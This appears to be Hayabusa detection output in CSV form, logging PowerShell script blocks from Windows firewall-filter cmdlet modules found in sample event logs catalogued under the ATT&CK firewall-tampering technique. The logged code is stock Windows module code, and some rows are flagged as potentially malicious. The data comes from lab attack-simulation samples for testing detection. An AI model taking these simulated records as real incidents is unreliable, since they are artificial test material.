[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } 
} Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { 
throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.000 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() 
Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] 
[ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.000 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.001 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.003 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH 
firewall rule activation.evtx +2021-04-23 10:09:45.004 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.026 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] 
